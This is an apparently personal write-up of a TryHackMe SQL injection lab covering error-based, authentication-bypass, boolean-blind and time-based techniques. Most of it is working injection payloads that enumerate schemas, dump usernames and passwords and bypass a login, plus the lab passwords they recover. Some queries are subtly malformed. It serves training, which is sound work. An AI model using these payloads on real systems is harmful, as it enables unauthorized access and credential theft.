TryHackMe | SQL Injection

Learn how to detect and exploit SQL Injection vulnerabilities.

In this practical example, we are presented with a website where we will exploit for.

1. Error Based Sqli
2. Blind Sqli
3. Boolean Based Sqli
4. Time Based Sqli

Level One. Error Based SQLi

in this room, we are required to discover martins password, a visit to the website looks as shown below.

To proceed to the next level, you are required to find martins password who is a user.

Trying to change the id value from ‘1’ to another value, shows that no results were found.

Lets proceed to check for the number of columns available.

id=1 UNION SELECT 1,2,3;-- 
/*Paste to the url righ after the 'id' this proves that the table has 3 columns*/

Next we need to know what database the table is running under.

0 UNION SELECT 1,2, database();--
/*you can replace the id value with digits from '0-9' until the database shows the database. 'trial and error'*/

The database is sqli_one

Next lets enumerate for the contents of the table using group_concat & information_schema.

id=0 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables WHERE table_schema='sqli_one';--

Bingo! now we know we have article and staff_users as columns in our table

We are mostly intrested with staff_users, so lets proceed to enumerate further.

Get to discover what lies behind staff_users.

id=0 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns WHERE table_name='staff_users';--

the column staff_users has 3 items, id,password & username. in our case, we re intrested with Passwords and Usernames.

Lets proceed to disclose the passwords and usernames of the users.

id=0 UNION SELECT 1,2,group_concat(username,':',password) from staff_users;--

Now we have martins password as pa$$word

username: Martin , password: pa$$word

Conclusion

This type of SQL Injection is the most useful for easily obtaining information about the database structure as error messages from the database are printed directly to the browser screen. This can often be used to enumerate a whole database

Level Two

Blind SQLi

In this room, we are required to bypass the password of the user ‘admin’.

a look at the SQL Query:

select * from users where username=’’ and password=’’ LIMIT 1;

If we know there is a user goin by admin. Then our SQL Query would look like this.

select * from users where username='admin' and password='' LIMIT 1;

But the password is unknown and therefore we could use the 1=1 method to try and bypass the login.

select * from users where 
username='admin'
password='' OR 1=1;--

Trying the password as ‘ OR 1=1; —

gets you direct access as admin

Hurray! you we bypassed the login.

conclusion

Blind SQL Injection techniques is when bypassing authentication methods such as login forms. In this instance, we aren’t that interested in retrieving data from the database; We just want to get past the login.

Level Three

Boolean Based Blind SQLi

Boolean based sqli is when the outcome is either True or False.

In this level, we are presented with a login form in which we are required to bypass the login. Trying to input the the value admin in the url bar returns the value True.

We will continue to manipulate the URL bar by adding the value user’. Doing this gives us a ‘False’ feedback.

Now lets try user’ UNION SELECT to get the number of columns in this table

user' UNION SELECT 1,2,3;--

This shows you the table has 3 columns as the value returned to True.

user' UNION SELECT 1,2,database() like 'sqli_three%';--

Now that we know the database is sqli_three, the next step is to determine the table names. Try enumerating all the letters until you got a ‘True’ value. In our case, it is ‘users’

user' UNION SELECT 1,2,3 from information_schema.tables where table_schema='sqli_three' and table_name like 'users%';--

The table name user. What’s behind the columns?

user' UNION SELECT 1,2,3 from information_schema.columns where table_schema='sqli_three' and table_name='users' and column_name like 'username%';--

What do we know? We know the table ‘users’ has a column ‘username’ and ‘password’. lets check for the names under the username.

user' UNION SELECT 1,2,3 from users where username like 'admin%';--

Hurrah! we got an user by admin. Lets enumerate his password.

user' UNION SELECT 1,2,3 from users where username='admin' and password like '3845%';--

we got the password as 3845. Lets login

Level Four

Time Based Blind SQLi

In this level, we are presented with a login form but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as SLEEP(x) alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement.

If the query is right, the we will only see a response after the time we had set.

To begin with, lets start by trying to discover the number of columns by writing the url below.

user' UNION SELECT SLEEP(5),2;--

The table has two columns. Now lets discover the contents of the table.

user' UNION SELECT SLEEP(5),2 WHERE database() like'sqli_four%';--

the table uses sqli_four.

Lets enumerate further to get the contents of the table.

user' UNION SELECT SLEEP(5),2 from information_schema.tables where table_schema='sqli_four' and table_name'users%';--

There is a table named ‘users’. lets try see what lies behind this column.

Try login in with user ‘admin’ and password is 4961